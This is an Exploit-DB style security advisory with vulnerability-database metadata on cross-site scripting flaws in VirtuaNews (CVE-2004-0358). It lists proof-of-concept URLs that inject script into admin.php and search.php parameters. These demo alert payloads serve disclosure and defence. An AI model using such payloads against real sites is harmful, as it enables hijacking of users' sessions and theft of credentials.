source: http://www.securityfocus.com/bid/9812/info
It has been reported that the VirtuaNews non-default modules 'Files' and 'Vulns' are prone to multiple cross-site scripting vulnerabilities. These problems surround the application's failure to properly validate user supplied URI input. When exploited an attacker can execute arbitrary script and HTML code in the context of the vulnerable application.
The supplied code is rendered in the browser in the context of the affected application. This may allow an attacker to craft a malicious link, facilitating a cross-site scripting attack.
Attackers may exploit this vulnerability to steal authentication credentials. Other attacks may also be possible.
Affecting the 'Vulns' module:
http://www.example.com/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>
http://www.example.com/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')</script>
http://www.example.com/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>
Affecting the 'Files' module:
http://www.example.com/admin.php?action=files&expand="><script>alert('XSS')</script>
http://www.example.com/admin.php?action=files_cat_delete&id="><script>alert('XSS')</script>
http://www.example.com/admin.php?action=files_check&catid="><script>alert('XSS')</script>
http://www.example.com/admin.php?action=newslogo_upload&"><script>alert('XSS')</script>
{"bulletinFamily": "exploit", "id": "EDB-ID:23792", "cvelist": ["CVE-2004-0358"], "modified": "2004-03-05T00:00:00", "lastseen": "2016-02-02T21:49:29", "edition": 1, "sourceData": "source: http://www.securityfocus.com/bid/9812/info\r\n\r\nIt has been reported that the VirtuaNews non-default modules 'Files' and 'Vulns' are prone to multiple cross-site scripting vulnerabilities. These problems surround the application's failure to properly validate user supplied URI input. When exploited an attacker can execute arbitrary script and HTML code in the context of the vulnerable application.\r\n\r\nThe supplied code is rendered in the browser in the context of the affected application. This may allow an attacker to craft a malicious link, facilitating a cross-site scripting attack.\r\n\r\nAttackers may exploit this vulnerability to steal authentication credentials. Other attacks may also be possible.\r\n\r\nAffecting the 'Vulns' module:\r\nhttp://www.example.com/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~\"></textarea><script>alert('XSS')</script>\r\nhttp://www.example.com/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~\"></textarea>--><script>alert('XSS')</script>\r\nhttp://www.example.com/admin.php?\">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~\"></textarea><script>alert('XSS')</script>\r\n\r\nAffecting the 'Files' module:\r\nhttp://www.example.com/admin.php?action=files&expand=\"><script>alert('XSS')</script>\r\nhttp://www.example.com/admin.php?action=files_cat_delete&id=\"><script>alert('XSS')</script>\r\nhttp://www.example.com/admin.php?action=files_check&catid=\"><script>alert('XSS')</script>\r\nhttp://www.example.com/admin.php?action=newslogo_upload&\"><script>alert('XSS')</script>", "published": "2004-03-05T00:00:00", "href": "https://www.exploit-db.com/exploits/23792/", "osvdbidlist": ["4959"], "reporter": "Rafel Ivgi The-Insider", "hash": "91e5b75456affd5e9c457b4bb3d73d6a5db2f66455f6f0c896945c28db769c17", "title": "VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "VirtuaSystems VirtuaNews 1.0.x Multiple Module Cross-Site Scripting Vulnerabilities. CVE-2004-0358. Webapps exploit for php platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23792/", "enchantments": {"vulnersScore": 8.3}}
{"result": {"cve": [{"id": "CVE-2004-0358", "type": "cve", "title": "CVE-2004-0358", "description": "Cross-site scripting (XSS) vulnerability in VirtuaNews Admin Panel Pro 1.0.3 allows remote attackers to execute arbitrary script as other users via (1) the mainnews parameter in admin.php, (2) the expand parameter in admin.php, (3) the id parameter in admin.php, (4) the catid parameter in admin.php, or (5) an unnamed parameter during the newslogo_upload action in admin.php.", "published": "2004-11-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0358", "cvelist": ["CVE-2004-0358"], "lastseen": "2017-07-11T11:14:25"}], "osvdb": [{"id": "OSVDB:4156", "type": "osvdb", "title": "VirtuaNews admin.php mainnews Variable XSS", "description": "## Vulnerability Description\nVirtuaNews contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the \"mainnews\" variables upon submission to the \"admin.php\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nVirtuaNews contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the \"mainnews\" variables upon submission to the \"admin.php\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/admin.php?action=news_add&catid=SELECT&title=~~~~~~~~~~~&main\nnews=~~~~\"></textarea><script>alert('XSS')</script>\nhttp://[victim]/admin.php?action=news_add&catid=SELECT&title=~~~~~~~~~~~&main\nnews=~~~~\"></textarea>--><script>alert('XSS')</script>\nhttp://[victim]/admin.php?\">action=news_add&catid=SELECT&title=~~~~~~~~~~~&ma\ninnews=~~~~\"></textarea><script>alert('XSS')</script>\n## References:\nVendor URL: http://www.virtuanews.co.uk/\n[Secunia Advisory ID:11054](https://secuniaresearch.flexerasoftware.com/advisories/11054/)\n[Related OSVDB ID: 4157](https://vulners.com/osvdb/OSVDB:4157)\n[Related OSVDB ID: 4959](https://vulners.com/osvdb/OSVDB:4959)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0069.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0052.html\nISS X-Force ID: 15402\n[CVE-2004-0358](https://vulners.com/cve/CVE-2004-0358)\nBugtraq ID: 9819\n", "published": "2004-03-08T08:30:51", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:4156", "cvelist": ["CVE-2004-0358"], "lastseen": "2017-04-28T13:19:58"}, {"id": "OSVDB:4157", "type": "osvdb", "title": "VirtuaNews search.php query Variable XSS ", "description": "## Vulnerability Description\nVirtuaNews contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the \"query\" variable upon submission to the \"search.php\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Technical Description\nThis XSS vulnerability in the VirtuaNews software has been reported as being incorrect by Ravish of Linux Advisory.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nVirtuaNews contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the \"query\" variable upon submission to the \"search.php\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/forum/search.php?do=process&showposts=0&query=<script>alert('X\nSS')</script>\n## References:\nVendor URL: http://www.virtuanews.co.uk/\n[Secunia Advisory ID:11054](https://secuniaresearch.flexerasoftware.com/advisories/11054/)\n[Related OSVDB ID: 4156](https://vulners.com/osvdb/OSVDB:4156)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0069.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0052.html\nISS X-Force ID: 15402\n[CVE-2004-0358](https://vulners.com/cve/CVE-2004-0358)\n", "published": "2004-03-08T08:30:51", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:4157", "cvelist": ["CVE-2004-0358"], "lastseen": "2017-04-28T13:19:58"}, {"id": "OSVDB:4959", "type": "osvdb", "title": "VirtuaNews Files/Vulns Module XSS", "description": "## Vulnerability Description\nVirtuaNews add-on modules contain a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate user input to various scripts in the \"Files\" or \"Vulns\" modules. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nVirtuaNews add-on modules contain a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate user input to various scripts in the \"Files\" or \"Vulns\" modules. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nThe following will only work if the files module is installed:\nhttp://[victim]/admin.php?action=files&expand=\"><script>alert('XSS')</script>\nhttp://[victim]/admin.php?action=files_cat_delete&id=\"><script>alert('XSS')</s\ncript>\nhttp://[victim]/admin.php?action=files_check&catid=\"><script>alert('XSS')</scr\nipt>\n\nThe following will only work for some development versions of the module and it must be installed:\nhttp://[victim]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main\nnews=~~~~\"></textarea><script>alert('XSS')</script>\nhttp://[victim]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main\nnews=~~~~\"></textarea>--><script>alert('XSS')</script>\nhttp://[victim]/admin.php?\">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&ma\ninnews=~~~~\"></textarea><script>alert('XSS')</script>\n## References:\nVendor URL: http://www.virtuanews.co.uk/\n[Secunia Advisory ID:11054](https://secuniaresearch.flexerasoftware.com/advisories/11054/)\n[Related OSVDB ID: 4156](https://vulners.com/osvdb/OSVDB:4156)\n[Related OSVDB ID: 4157](https://vulners.com/osvdb/OSVDB:4157)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0069.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0052.html\nISS X-Force ID: 15402\n[CVE-2004-0358](https://vulners.com/cve/CVE-2004-0358)\nBugtraq ID: 9812\n", "published": "2004-03-08T08:30:51", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:4959", "cvelist": ["CVE-2004-0358"], "lastseen": "2017-04-28T13:19:59"}]}}